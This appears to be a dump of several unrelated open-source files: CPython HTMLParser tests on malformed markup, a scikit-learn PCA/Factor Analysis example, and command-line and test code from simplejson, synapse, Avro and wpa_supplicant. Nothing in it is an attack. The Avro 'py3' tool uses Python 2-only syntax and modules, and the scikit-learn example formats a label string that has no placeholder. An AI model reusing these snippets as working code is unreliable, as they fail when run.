self._run_check("<a", [('data', '<a')]) self._run_check("<a foo='bar'", [('data', "<a foo='bar'")]) self._run_check("<a foo='bar", [('data', "<a foo='bar")]) self._run_check("<a foo='>'", [('data', "<a foo='>'")]) self._run_check("<a foo='>", [('data', "<a foo='>")]) def test_slashes_in_starttag(self): self._run_check('<a foo="var"/>', [('startendtag', 'a', [('foo', 'var')])]) html = ('<img width=902 height=250px ' 'src="/sites/default/files/images/homepage/foo.jpg" ' '/*what am I doing here*/ />') expected = [( 'startendtag', 'img', [('width', '902'), ('height', '250px'), ('src', '/sites/default/files/images/homepage/foo.jpg'), ('*what', None), ('am', None), ('i', None), ('doing', None), ('here*', None)] )] self._run_check(html, expected) html = ('<a / /foo/ / /=/ / /bar/ / 
/>' '<a / /foo/ / /=/ / /bar/ / >') expected = [ ('startendtag', 'a', [('foo', None), ('=', None), ('bar', None)]), ('starttag', 'a', [('foo', None), ('=', None), ('bar', None)]) ] self._run_check(html, expected) def test_declaration_junk_chars(self): self._run_check("<!DOCTYPE foo $ >", [('decl', 'DOCTYPE foo $ ')]) def test_illegal_declarations(self): self._run_check('<!spacer type="block" height="25">', [('comment', 'spacer type="block" height="25"')]) def test_with_unquoted_attributes(self): # see #12008 html = ("<html><body bgcolor=d0ca90 text='181008'>" "<table cellspacing=0 cellpadding=1 width=100% ><tr>" "<td align=left><font size=-1>" "- <a href=/rabota/><span class=en> software-and-i</span></a>" "- <a href='/1/'><span class=en> library</span></a></table>") expected = [ ('starttag', 'html', []), ('starttag', 'body', [('bgcolor', 'd0ca90'), ('text', '181008')]), ('starttag', 'table', [('cellspacing', '0'), ('cellpadding', '1'), ('width', '100%')]), ('starttag', 'tr', []), ('starttag', 'td', [('align', 'left')]), ('starttag', 'font', [('size', '-1')]), ('data', '- '), ('starttag', 'a', [('href', '/rabota/')]), ('starttag', 'span', [('class', 'en')]), ('data', ' software-and-i'), ('endtag', 'span'), ('endtag', 'a'), ('data', '- '), ('starttag', 'a', [('href', '/1/')]), ('starttag', 'span', [('class', 'en')]), ('data', ' library'), ('endtag', 'span'), ('endtag', 'a'), ('endtag', 'table') ] self._run_check(html, expected) def test_comma_between_attributes(self): self._run_check('<form action="/xxx.php?a=1&amp;b=2&amp", ' 'method="post">', [ ('starttag', 'form', [('action', '/xxx.php?a=1&b=2&amp'), (',', None), ('method', 'post')])]) def test_weird_chars_in_unquoted_attribute_values(self): self._run_check('<form action=bogus|&#()value>', [ ('starttag', 'form', [('action', 'bogus|&#()value')])]) def test_invalid_end_tags(self): # A collection of broken end tags. <br> is used as separator. 
# see http://www.w3.org/TR/html5/tokenization.html#end-tag-open-state # and #13993 html = ('<br></label</p><br></div end tmAd-leaderBoard><br></<h4><br>' '</li class="unit"><br></li\r\n\t\t\t\t\t\t</ul><br></><br>') expected = [('starttag', 'br', []), # < is part of the name, / is discarded, p is an attribute ('endtag', 'label<'), ('starttag', 'br', []), # text and attributes are discarded ('endtag', 'div'), ('starttag', 'br', []), # comment because the first char after </ is not a-zA-Z ('comment', '<h4'), ('starttag', 'br', []), # attributes are discarded ('endtag', 'li'), ('starttag', 'br', []), # everything till ul (included) is discarded ('endtag', 'li'), ('starttag', 'br', []), # </> is ignored ('starttag', 'br', [])] self._run_check(html, expected) def test_broken_invalid_end_tag(self): # This is technically wrong (the "> shouldn't be included in the 'data') # but is probably not worth fixing it (in addition to all the cases of # the previous test, it would require a full attribute parsing). 
# see #13993 html = '<b>This</b attr=">"> confuses the parser' expected = [('starttag', 'b', []), ('data', 'This'), ('endtag', 'b'), ('data', '"> confuses the parser')] self._run_check(html, expected) def test_correct_detection_of_start_tags(self): # see #13273 html = ('<div style="" ><b>The <a href="some_url">rain</a> ' '<br /> in <span>Spain</span></b></div>') expected = [ ('starttag', 'div', [('style', '')]), ('starttag', 'b', []), ('data', 'The '), ('starttag', 'a', [('href', 'some_url')]), ('data', 'rain'), ('endtag', 'a'), ('data', ' '), ('startendtag', 'br', []), ('data', ' in '), ('starttag', 'span', []), ('data', 'Spain'), ('endtag', 'span'), ('endtag', 'b'), ('endtag', 'div') ] self._run_check(html, expected) html = '<div style="", foo = "bar" ><b>The <a href="some_url">rain</a>' expected = [ ('starttag', 'div', [('style', ''), (',', None), ('foo', 'bar')]), ('starttag', 'b', []), ('data', 'The '), ('starttag', 'a', [('href', 'some_url')]), ('data', 'rain'), ('endtag', 'a'), ] self._run_check(html, expected) def test_unescape_function(self): p = self.get_collector() self.assertEqual(p.unescape('&#bad;'),'&#bad;') self.assertEqual(p.unescape('&#0038;'),'&') # see #12888 self.assertEqual(p.unescape('&#123; ' * 1050), '{ ' * 1050) def test_broken_comments(self): html = ('<! not really a comment >' '<! not a comment either -->' '<! -- close enough -->' '<!><!<-- this was an empty comment>' '<!!! another bogus comment !!!>') expected = [ ('comment', ' not really a comment '), ('comment', ' not a comment either --'), ('comment', ' -- close enough --'), ('comment', ''), ('comment', '<-- this was an empty comment'), ('comment', '!! another bogus comment !!!'), ] self._run_check(html, expected) def test_broken_condcoms(self): # these condcoms are missing the '--' after '<!' and before the '>' html = ('<![if !(IE)]>broken condcom<![endif]>' '<![if ! 
IE]><link href="favicon.tiff"/><![endif]>' '<![if !IE 6]><img src="firefox.png" /><![endif]>' '<![if !ie 6]><b>foo</b><![endif]>' '<![if (!IE)|(lt IE 9)]><img src="mammoth.bmp" /><![endif]>') # According to the HTML5 specs sections "8.2.4.44 Bogus comment state" # and "8.2.4.45 Markup declaration open state", comment tokens should # be emitted instead of 'unknown decl', but calling unknown_decl # provides more flexibility. # See also Lib/_markupbase.py:parse_declaration expected = [ ('unknown decl', 'if !(IE)'), ('data', 'broken condcom'), ('unknown decl', 'endif'), ('unknown decl', 'if ! IE'), ('startendtag', 'link', [('href', 'favicon.tiff')]), ('unknown decl', 'endif'), ('unknown decl', 'if !IE 6'), ('startendtag', 'img', [('src', 'firefox.png')]), ('unknown decl', 'endif'), ('unknown decl', 'if !ie 6'), ('starttag', 'b', []), ('data', 'foo'), ('endtag', 'b'), ('unknown decl', 'endif'), ('unknown decl', 'if (!IE)|(lt IE 9)'), ('startendtag', 'img', [('src', 'mammoth.bmp')]), ('unknown decl', 'endif') ] self._run_check(html, expected) class AttributesStrictTestCase(TestCaseBase): def get_collector(self): return EventCollector(strict=True) def test_attr_syntax(self): output = [ ("starttag", "a", [("b", "v"), ("c", "v"), ("d", "v"), ("e", None)]) ] self._run_check("""<a b='v' c="v" d=v e>""", output) self._run_check("""<a b = 'v' c = "v" d = v e>""", output) self._run_check("""<a\nb\n=\n'v'\nc\n=\n"v"\nd\n=\nv\ne>""", output) self._run_check("""<a\tb\t=\t'v'\tc\t=\t"v"\td\t=\tv\te>""", output) def test_attr_values(self): self._run_check("""<a b='xxx\n\txxx' c="yyy\t\nyyy" d='\txyz\n'>""", [("starttag", "a", [("b", "xxx\n\txxx"), ("c", "yyy\t\nyyy"), ("d", "\txyz\n")])]) self._run_check("""<a b='' c="">""", [("starttag", "a", [("b", ""), ("c", "")])]) # Regression test for SF patch #669683. self._run_check("<e a=rgb(1,2,3)>", [("starttag", "e", [("a", "rgb(1,2,3)")])]) # Regression test for SF bug #921657. 
self._run_check( "<a href=mailto:xyz@example.com>", [("starttag", "a", [("href", "mailto:xyz@example.com")])]) def test_attr_nonascii(self): # see issue 7311 self._run_check( "<img src=/foo/bar.png alt=\u4e2d\u6587>", [("starttag", "img", [("src", "/foo/bar.png"), ("alt", "\u4e2d\u6587")])]) self._run_check( "<a title='\u30c6\u30b9\u30c8' href='\u30c6\u30b9\u30c8.html'>", [("starttag", "a", [("title", "\u30c6\u30b9\u30c8"), ("href", "\u30c6\u30b9\u30c8.html")])]) self._run_check( '<a title="\u30c6\u30b9\u30c8" href="\u30c6\u30b9\u30c8.html">', [("starttag", "a", [("title", "\u30c6\u30b9\u30c8"), ("href", "\u30c6\u30b9\u30c8.html")])]) def test_attr_entity_replacement(self): self._run_check( "<a b='&amp;&gt;&lt;&quot;&apos;'>", [("starttag", "a", [("b", "&><\"'")])]) def test_attr_funky_names(self): self._run_check( "<a a.b='v' c:d=v e-f=v>", [("starttag", "a", [("a.b", "v"), ("c:d", "v"), ("e-f", "v")])]) def test_entityrefs_in_attributes(self): self._run_check( "<html foo='&euro;&amp;&#97;&#x61;&unsupported;'>", [("starttag", "html", [("foo", "\u20AC&aa&unsupported;")])]) class AttributesTolerantTestCase(AttributesStrictTestCase): def get_collector(self): return EventCollector(strict=False) def test_attr_funky_names2(self): self._run_check( "<a $><b $=%><c \=/>", [("starttag", "a", [("$", None)]), ("starttag", "b", [("$", "%")]), ("starttag", "c", [("\\", "/")])]) def test_entities_in_attribute_value(self): # see #1200313 for entity in ['&', '&amp;', '&#38;', '&#x26;']: self._run_check('<a href="%s">' % entity, [("starttag", "a", [("href", "&")])]) self._run_check("<a href='%s'>" % entity, [("starttag", "a", [("href", "&")])]) self._run_check("<a href=%s>" % entity, [("starttag", "a", [("href", "&")])]) def test_malformed_attributes(self): # see #13357 html = ( "<a href=test'style='color:red;bad1'>test - bad1</a>" "<a href=test'+style='color:red;ba2'>test - bad2</a>" "<a href=test'&nbsp;style='color:red;bad3'>test - bad3</a>" "<a href = 
test'&nbsp;style='color:red;bad4' >test - bad4</a>" ) expected = [ ('starttag', 'a', [('href', "test'style='color:red;bad1'")]), ('data', 'test - bad1'), ('endtag', 'a'), ('starttag', 'a', [('href', "test'+style='color:red;ba2'")]), ('data', 'test - bad2'), ('endtag', 'a'), ('starttag', 'a', [('href', "test'\xa0style='color:red;bad3'")]), ('data', 'test - bad3'), ('endtag', 'a'), ('starttag', 'a', [('href', "test'\xa0style='color:red;bad4'")]), ('data', 'test - bad4'), ('endtag', 'a') ] self._run_check(html, expected) def test_malformed_adjacent_attributes(self): # see #12629 self._run_check('<x><y z=""o"" /></x>', [('starttag', 'x', []), ('startendtag', 'y', [('z', ''), ('o""', None)]), ('endtag', 'x')]) self._run_check('<x><y z="""" /></x>', [('starttag', 'x', []), ('startendtag', 'y', [('z', ''), ('""', None)]), ('endtag', 'x')]) # see #755670 for the following 3 tests def test_adjacent_attributes(self): self._run_check('<a width="100%"cellspacing=0>', [("starttag", "a", [("width", "100%"), ("cellspacing","0")])]) self._run_check('<a id="foo"class="bar">', [("starttag", "a", [("id", "foo"), ("class","bar")])]) def test_missing_attribute_value(self): self._run_check('<a v=>', [("starttag", "a", [("v", "")])]) def test_javascript_attribute_value(self): self._run_check("<a href=javascript:popup('/popup/help.html')>", [("starttag", "a", [("href", "javascript:popup('/popup/help.html')")])]) def test_end_tag_in_attribute_value(self): # see #1745761 self._run_check("<a href='http://www.example.org/\">;'>spam</a>", [("starttag", "a", [("href", "http://www.example.org/\">;")]), ("data", "spam"), ("endtag", "a")]) def test_main(): support.run_unittest(HTMLParserStrictTestCase, HTMLParserTolerantTestCase, AttributesStrictTestCase, AttributesTolerantTestCase) if __name__ == "__main__": test_main()
bsd-3-clause
q1ang/scikit-learn
examples/decomposition/plot_pca_vs_fa_model_selection.py
142
4467
""" =============================================================== Model selection with Probabilistic PCA and Factor Analysis (FA) =============================================================== Probabilistic PCA and Factor Analysis are probabilistic models. The consequence is that the likelihood of new data can be used for model selection and covariance estimation. Here we compare PCA and FA with cross-validation on low rank data corrupted with homoscedastic noise (noise variance is the same for each feature) or heteroscedastic noise (noise variance is the different for each feature). In a second step we compare the model likelihood to the likelihoods obtained from shrinkage covariance estimators. One can observe that with homoscedastic noise both FA and PCA succeed in recovering the size of the low rank subspace. The likelihood with PCA is higher than FA in this case. However PCA fails and overestimates the rank when heteroscedastic noise is present. Under appropriate circumstances the low rank models are more likely than shrinkage models. The automatic estimation from Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604 by Thomas P. Minka is also compared. """ print(__doc__) # Authors: Alexandre Gramfort # Denis A. Engemann # License: BSD 3 clause import numpy as np import matplotlib.pyplot as plt from scipy import linalg from sklearn.decomposition import PCA, FactorAnalysis from sklearn.covariance import ShrunkCovariance, LedoitWolf from sklearn.cross_validation import cross_val_score from sklearn.grid_search import GridSearchCV ############################################################################### # Create the data n_samples, n_features, rank = 1000, 50, 10 sigma = 1. 
rng = np.random.RandomState(42) U, _, _ = linalg.svd(rng.randn(n_features, n_features)) X = np.dot(rng.randn(n_samples, rank), U[:, :rank].T) # Adding homoscedastic noise X_homo = X + sigma * rng.randn(n_samples, n_features) # Adding heteroscedastic noise sigmas = sigma * rng.rand(n_features) + sigma / 2. X_hetero = X + rng.randn(n_samples, n_features) * sigmas ############################################################################### # Fit the models n_components = np.arange(0, n_features, 5) # options for n_components def compute_scores(X): pca = PCA() fa = FactorAnalysis() pca_scores, fa_scores = [], [] for n in n_components: pca.n_components = n fa.n_components = n pca_scores.append(np.mean(cross_val_score(pca, X))) fa_scores.append(np.mean(cross_val_score(fa, X))) return pca_scores, fa_scores def shrunk_cov_score(X): shrinkages = np.logspace(-2, 0, 30) cv = GridSearchCV(ShrunkCovariance(), {'shrinkage': shrinkages}) return np.mean(cross_val_score(cv.fit(X).best_estimator_, X)) def lw_score(X): return np.mean(cross_val_score(LedoitWolf(), X)) for X, title in [(X_homo, 'Homoscedastic Noise'), (X_hetero, 'Heteroscedastic Noise')]: pca_scores, fa_scores = compute_scores(X) n_components_pca = n_components[np.argmax(pca_scores)] n_components_fa = n_components[np.argmax(fa_scores)] pca = PCA(n_components='mle') pca.fit(X) n_components_pca_mle = pca.n_components_ print("best n_components by PCA CV = %d" % n_components_pca) print("best n_components by FactorAnalysis CV = %d" % n_components_fa) print("best n_components by PCA MLE = %d" % n_components_pca_mle) plt.figure() plt.plot(n_components, pca_scores, 'b', label='PCA scores') plt.plot(n_components, fa_scores, 'r', label='FA scores') plt.axvline(rank, color='g', label='TRUTH: %d' % rank, linestyle='-') plt.axvline(n_components_pca, color='b', label='PCA CV: %d' % n_components_pca, linestyle='--') plt.axvline(n_components_fa, color='r', label='FactorAnalysis CV: %d' % n_components_fa, linestyle='--') 
plt.axvline(n_components_pca_mle, color='k', label='PCA MLE: %d' % n_components_pca_mle, linestyle='--') # compare with other covariance estimators plt.axhline(shrunk_cov_score(X), color='violet', label='Shrunk Covariance MLE', linestyle='-.') plt.axhline(lw_score(X), color='orange', label='LedoitWolf MLE' % n_components_pca_mle, linestyle='-.') plt.xlabel('nb of components') plt.ylabel('CV scores') plt.legend(loc='lower right') plt.title(title) plt.show()
bsd-3-clause
borysiasty/inasafe
safe_extras/simplejson/tool.py
262
1136
r"""Command-line tool to validate and pretty-print JSON Usage:: $ echo '{"json":"obj"}' | python -m simplejson.tool { "json": "obj" } $ echo '{ 1.2:3.4}' | python -m simplejson.tool Expecting property name: line 1 column 2 (char 2) """ from __future__ import with_statement import sys import simplejson as json def main(): if len(sys.argv) == 1: infile = sys.stdin outfile = sys.stdout elif len(sys.argv) == 2: infile = open(sys.argv[1], 'r') outfile = sys.stdout elif len(sys.argv) == 3: infile = open(sys.argv[1], 'r') outfile = open(sys.argv[2], 'w') else: raise SystemExit(sys.argv[0] + " [infile [outfile]]") with infile: try: obj = json.load(infile, object_pairs_hook=json.OrderedDict, use_decimal=True) except ValueError: raise SystemExit(sys.exc_info()[1]) with outfile: json.dump(obj, outfile, sort_keys=True, indent=' ', use_decimal=True) outfile.write('\n') if __name__ == '__main__': main()
gpl-3.0
vertexproject/synapse
synapse/tests/test_tools_csvtool.py
1
6295
import csv from unittest import mock import synapse.common as s_common import synapse.telepath as s_telepath import synapse.tests.utils as s_t_utils import synapse.tools.csvtool as s_csvtool csvfile = b'''ipv4,fqdn,notes 1.2.3.4,vertex.link,malware 8.8.8.8,google.com,whitelist ''' csvstorm = b''' for ($ipv4, $fqdn, $note) in $rows { $lib.print("oh hai") [ inet:dns:a=($fqdn,$ipv4) ] } ''' csvfile_missing = b'''fqdn,email,tag vertex.link,,mytag google.com,myemail@email.com, yahoo.com,foo@bar.com,mytag ''' csvstorm_missing = b''' for ($fqdn, $email, $tag) in $rows { $lib.print("hello hello") [ inet:dns:soa=$lib.guid() :fqdn=$fqdn :email?=$email +?#$tag ] } ''' # count is used for test coverage. csvstorm_export = b''' test:int $lib.csv.emit($node, $node.props.loc) | count ''' class CsvToolTest(s_t_utils.SynTest): def _getOldSynVers(self): return (0, 0, 0) async def test_csvtool(self): async with self.getTestCore() as core: url = core.getLocalUrl() dirn = s_common.gendir(core.dirn, 'junk') logpath = s_common.genpath(dirn, 'csvtest.log') csvpath = s_common.genpath(dirn, 'csvtest.csv') with s_common.genfile(csvpath) as fd: fd.write(csvfile) stormpath = s_common.genpath(dirn, 'csvtest.storm') with s_common.genfile(stormpath) as fd: fd.write(csvstorm) argv = ['--csv-header', '--debug', '--cortex', url, '--logfile', logpath, stormpath, csvpath] outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('oh hai') outp.expect('2 nodes') with mock.patch('synapse.telepath.Proxy._getSynVers', self._getOldSynVers): outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('Cortex version 0.0.0 is outside of the csvtool supported range') async def test_csvtool_missingvals(self): async with self.getTestCore() as core: url = core.getLocalUrl() dirn = s_common.gendir(core.dirn, 'junk') logpath = s_common.genpath(dirn, 'csvtest.log') csvpath = s_common.genpath(dirn, 'csvtest.csv') with s_common.genfile(csvpath) as fd: fd.write(csvfile_missing) 
stormpath = s_common.genpath(dirn, 'csvtest.storm') with s_common.genfile(stormpath) as fd: fd.write(csvstorm_missing) argv = ['--csv-header', '--debug', '--cortex', url, '--logfile', logpath, stormpath, csvpath] outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('hello hello') outp.expect("'fqdn': 'google.com'") outp.expect('3 nodes') async def test_csvtool_local(self): with self.getTestDir() as dirn: logpath = s_common.genpath(dirn, 'csvtest.log') csvpath = s_common.genpath(dirn, 'csvtest.csv') with s_common.genfile(csvpath) as fd: fd.write(csvfile) stormpath = s_common.genpath(dirn, 'csvtest.storm') with s_common.genfile(stormpath) as fd: fd.write(csvstorm) argv = ['--csv-header', '--debug', '--test', '--logfile', logpath, stormpath, csvpath] outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('2 nodes') async def test_csvtool_cli(self): with self.getTestDir() as dirn: logpath = s_common.genpath(dirn, 'csvtest.log') csvpath = s_common.genpath(dirn, 'csvtest.csv') with s_common.genfile(csvpath) as fd: fd.write(csvfile) stormpath = s_common.genpath(dirn, 'csvtest.storm') with s_common.genfile(stormpath) as fd: fd.write(csvstorm) argv = ['--csv-header', '--debug', '--cli', '--test', '--logfile', logpath, stormpath, csvpath] outp = self.getTestOutp() cmdg = s_t_utils.CmdGenerator(['storm --hide-props inet:fqdn', EOFError(), ]) with self.withCliPromptMockExtendOutp(outp): with self.withTestCmdr(cmdg): await s_csvtool.main(argv, outp=outp) outp.expect('inet:fqdn=google.com') outp.expect('2 nodes') async def test_csvtool_export(self): async with self.getTestCore() as core: await core.nodes('[ test:int=20 :loc=us ]') await core.nodes('[ test:int=30 :loc=cn ]') await core.nodes('[ test:int=40 ]') url = core.getLocalUrl() dirn = s_common.gendir(core.dirn, 'junk') csvpath = s_common.genpath(dirn, 'csvtest.csv') stormpath = s_common.genpath(dirn, 'csvtest.storm') with s_common.genfile(stormpath) as fd: 
fd.write(csvstorm_export) # test a few no-no cases argv = ['--test', '--export', stormpath, csvpath] outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('--export requires --cortex') argv = ['--cortex', url, '--export', stormpath, csvpath, 'lol.csv'] outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('--export requires exactly 1 csvfile') argv = ['--cortex', url, '--export', stormpath, csvpath] outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect('Counted 3 nodes.') outp.expect('3 csv rows') with open(csvpath, 'r') as fd: rows = [row for row in csv.reader(fd)] self.eq(rows, (['20', 'us'], ['30', 'cn'], ['40', ''])) with mock.patch('synapse.telepath.Proxy._getSynVers', self._getOldSynVers): outp = self.getTestOutp() await s_csvtool.main(argv, outp=outp) outp.expect(f'Cortex version 0.0.0 is outside of the csvtool supported range')
apache-2.0
ntent-ad/avro
lang/py3/avro/tool.py
21
5293
#!/usr/bin/env python3 # -*- mode: python -*- # -*- coding: utf-8 -*- # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Command-line tool NOTE: The API for the command-line tool is experimental. """ import sys import urllib from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler from avro import io from avro import datafile from avro import protocol from avro import ipc class GenericResponder(ipc.Responder): def __init__(self, proto, msg, datum): proto_json = file(proto, 'r').read() ipc.Responder.__init__(self, protocol.Parse(proto_json)) self.msg = msg self.datum = datum def invoke(self, message, request): if message.name == self.msg: print >> sys.stderr, "Message: %s Datum: %s" % (message.name, self.datum) # server will shut down after processing a single Avro request global server_should_shutdown server_should_shutdown = True return self.datum class GenericHandler(BaseHTTPRequestHandler): def do_POST(self): self.responder = responder call_request_reader = ipc.FramedReader(self.rfile) call_request = call_request_reader.read_framed_message() resp_body = self.responder.respond(call_request) self.send_response(200) self.send_header('Content-Type', 'avro/binary') self.end_headers() resp_writer = ipc.FramedWriter(self.wfile) 
resp_writer.write_framed_message(resp_body) if server_should_shutdown: print >> sys.stderr, "Shutting down server." self.server.force_stop() class StoppableHTTPServer(HTTPServer): """HTTPServer.shutdown added in Python 2.6. FML.""" stopped = False allow_reuse_address = True def __init__(self, *args, **kw): HTTPServer.__init__(self, *args, **kw) self.allow_reuse_address = True def serve_forever(self): while not self.stopped: self.handle_request() def force_stop(self): self.server_close() self.stopped = True self.serve_forever() def run_server(uri, proto, msg, datum): url_obj = urllib.parse.urlparse(uri) server_addr = (url_obj.hostname, url_obj.port) global responder global server_should_shutdown server_should_shutdown = False responder = GenericResponder(proto, msg, datum) server = StoppableHTTPServer(server_addr, GenericHandler) print("Port: %s" % server.server_port) sys.stdout.flush() server.allow_reuse_address = True print >> sys.stderr, "Starting server." server.serve_forever() def send_message(uri, proto, msg, datum): url_obj = urllib.parse.urlparse(uri) client = ipc.HTTPTransceiver(url_obj.hostname, url_obj.port) proto_json = file(proto, 'r').read() requestor = ipc.Requestor(protocol.Parse(proto_json), client) print(requestor.request(msg, datum)) def file_or_stdin(f): if f == "-": return sys.stdin else: return file(f) def main(args=sys.argv): if len(args) == 1: print("Usage: %s [dump|rpcreceive|rpcsend]" % args[0]) return 1 if args[1] == "dump": if len(args) != 3: print("Usage: %s dump input_file" % args[0]) return 1 for d in datafile.DataFileReader(file_or_stdin(args[2]), io.DatumReader()): print(repr(d)) elif args[1] == "rpcreceive": usage_str = "Usage: %s rpcreceive uri protocol_file " % args[0] usage_str += "message_name (-data d | -file f)" if len(args) not in [5, 7]: print(usage_str) return 1 uri, proto, msg = args[2:5] datum = None if len(args) > 5: if args[5] == "-file": reader = open(args[6], 'rb') datum_reader = io.DatumReader() dfr = 
datafile.DataFileReader(reader, datum_reader) datum = dfr.next() elif args[5] == "-data": print("JSON Decoder not yet implemented.") return 1 else: print(usage_str) return 1 run_server(uri, proto, msg, datum) elif args[1] == "rpcsend": usage_str = "Usage: %s rpcsend uri protocol_file " % args[0] usage_str += "message_name (-data d | -file f)" if len(args) not in [5, 7]: print(usage_str) return 1 uri, proto, msg = args[2:5] datum = None if len(args) > 5: if args[5] == "-file": reader = open(args[6], 'rb') datum_reader = io.DatumReader() dfr = datafile.DataFileReader(reader, datum_reader) datum = dfr.next() elif args[5] == "-data": print("JSON Decoder not yet implemented.") return 1 else: print(usage_str) return 1 send_message(uri, proto, msg, datum) return 0 if __name__ == "__main__": sys.exit(main(sys.argv))
apache-2.0
indashnet/InDashNet.Open.UN2000
android/external/wpa_supplicant_8/wpa_supplicant/examples/p2p/p2p_invite.py
29
5237
#!/usr/bin/python
# Tests p2p_invite
######### MAY NEED TO RUN AS SUDO #############

import dbus
import sys, os
import time
import gobject
import getopt
import threading
from dbus.mainloop.glib import DBusGMainLoop


def usage():
    # Print command-line help and exit is left to the caller.
    print "Usage:"
    print " %s -i <interface_name> -a <addr> \ " \
        % sys.argv[0]
    print " [-o <persistent_group_object>] [-w <wpas_dbus_interface>]"
    print "Options:"
    print " -i = interface name"
    print " -a = address of peer"
    print " -o = persistent group object path"
    print " -w = wpas dbus interface = fi.w1.wpa_supplicant1"
    print "Example:"
    print " %s -i p2p-wlan0-0 -a 00150083523c" % sys.argv[0]


# Required Signals
#
# wpa_supplicant reports the outcome of the invitation asynchronously via
# the "InvitationResult" D-Bus signal; this handler prints the status (and
# BSSID, when present) and then hard-exits the whole process.
def InvitationResult(invite_result):
    print "Inviation Result signal :"
    status = invite_result['status']
    print "status = ", status
    if invite_result.has_key('BSSID'):
        bssid = invite_result['BSSID']
        print "BSSID = ", hex(bssid[0]), ":", \
            hex(bssid[1]), ":", hex(bssid[2]), ":", \
            hex(bssid[3]), ":", hex(bssid[4]), ":", \
            hex(bssid[5])
    # os._exit (not sys.exit) so the daemon thread running the main loop
    # is torn down immediately.
    os._exit(0)


class P2P_Invite (threading.Thread):
    # Needed Variables
    # NOTE(review): these class-level "global" statements have no effect;
    # nothing assigns the names in the class body, and the real state is
    # set on self in __init__. They only serve as an attribute inventory.
    global bus
    global wpas_object
    global interface_object
    global p2p_interface
    global interface_name
    global wpas
    global wpas_dbus_interface
    global path
    global addr
    global persistent_group_object

    # Dbus Paths
    global wpas_dbus_opath
    global wpas_dbus_interfaces_opath
    global wpas_dbus_interfaces_interface
    global wpas_dbus_interfaces_p2pdevice

    # Arguements
    global P2PDictionary

    # Constructor: resolves the wpa_supplicant D-Bus objects for the given
    # interface and registers the InvitationResult signal listener.
    def __init__(self, interface_name, wpas_dbus_interface, addr,
                 persistent_group_object):
        # Initializes variables and threads
        self.interface_name = interface_name
        self.wpas_dbus_interface = wpas_dbus_interface
        self.addr = addr
        self.persistent_group_object = persistent_group_object

        # Initializes thread; daemon=True allows ctrl-c to kill the script
        threading.Thread.__init__(self)
        self.daemon = True

        # Generating interface/object paths, e.g.
        # "fi.w1.wpa_supplicant1" -> "/fi/w1/wpa_supplicant1"
        self.wpas_dbus_opath = "/" + \
            self.wpas_dbus_interface.replace(".", "/")
        # NOTE(review): the doubled "wpas_wpas_" prefix looks like a typo,
        # but the attribute is never read afterwards, so it is harmless.
        self.wpas_wpas_dbus_interfaces_opath = self.wpas_dbus_opath + \
            "/Interfaces"
        self.wpas_dbus_interfaces_interface = \
            self.wpas_dbus_interface + ".Interface"
        self.wpas_dbus_interfaces_p2pdevice = \
            self.wpas_dbus_interfaces_interface \
            + ".P2PDevice"

        # Getting interfaces and objects
        DBusGMainLoop(set_as_default=True)
        self.bus = dbus.SystemBus()
        self.wpas_object = self.bus.get_object(
            self.wpas_dbus_interface,
            self.wpas_dbus_opath)
        self.wpas = dbus.Interface(self.wpas_object,
                                   self.wpas_dbus_interface)

        # Try to see if supplicant knows about interface
        # If not, print an error and exit
        try:
            self.path = self.wpas.GetInterface(
                self.interface_name)
        except dbus.DBusException, exc:
            error = 'Error:\n Interface ' + self.interface_name \
                + ' was not found'
            print error
            usage()
            os._exit(0)

        self.interface_object = self.bus.get_object(
            self.wpas_dbus_interface, self.path)
        self.p2p_interface = dbus.Interface(
            self.interface_object,
            self.wpas_dbus_interfaces_p2pdevice)

        # Adds listener for the asynchronous invitation outcome
        self.bus.add_signal_receiver(
            InvitationResult,
            dbus_interface=self.wpas_dbus_interfaces_p2pdevice,
            signal_name="InvitationResult")

    # Sets up the p2p_invite argument dictionary: peer object path plus an
    # optional persistent group object.
    def constructArguements(self):
        self.P2PDictionary = \
            {'peer': dbus.ObjectPath(self.path + '/Peers/' + self.addr)}
        if (self.persistent_group_object != None):
            self.P2PDictionary.update(
                {"persistent_group_object":
                 self.persistent_group_object})

    # Run p2p_invite, then spin the GLib main loop so the signal handler
    # can fire while the main thread sleeps.
    def run(self):
        try:
            self.p2p_interface.Invite(self.P2PDictionary)
        except:
            print "Error:\n Invalid Arguements"
            usage()
            os._exit(0)

        # Allows other threads to keep working while MainLoop runs
        # Required for timeout implementation
        gobject.MainLoop().get_context().iteration(True)
        gobject.threads_init()
        gobject.MainLoop().run()


if __name__ == "__main__":
    # Defaults for optional inputs
    addr = None
    persistent_group_object = None
    wpas_dbus_interface = 'fi.w1.wpa_supplicant1'

    # interface_name is required
    interface_name = None

    # Using getopt to handle options
    try:
        options, args = getopt.getopt(sys.argv[1:], "hi:o:w:a:")
    except getopt.GetoptError:
        usage()
        quit()

    # If there's a switch, override the default option
    for key, value in options:
        # Help
        if (key == "-h"):
            usage()
            quit()
        # Interface Name
        elif (key == "-i"):
            interface_name = value
        # Peer address
        elif (key == "-a"):
            addr = value
        # Persistent group object path
        elif (key == "-o"):
            persistent_group_object = value
        # Dbus interface
        elif (key == "-w"):
            wpas_dbus_interface = value
        else:
            assert False, "unhandled option"

    # Interface name is required and was not given
    if (interface_name == None):
        print "Error:\n interface_name is required"
        usage()
        quit()

    # Peer address is also required
    if (addr == None):
        print "Error:\n peer address is required"
        usage()
        quit()

    try:
        p2p_invite_test = \
            P2P_Invite(interface_name, wpas_dbus_interface,
                       addr, persistent_group_object)
    except:
        print "Error:\n Invalid Arguements"
        usage()
        os._exit(1)

    p2p_invite_test.constructArguements()
    p2p_invite_test.start()

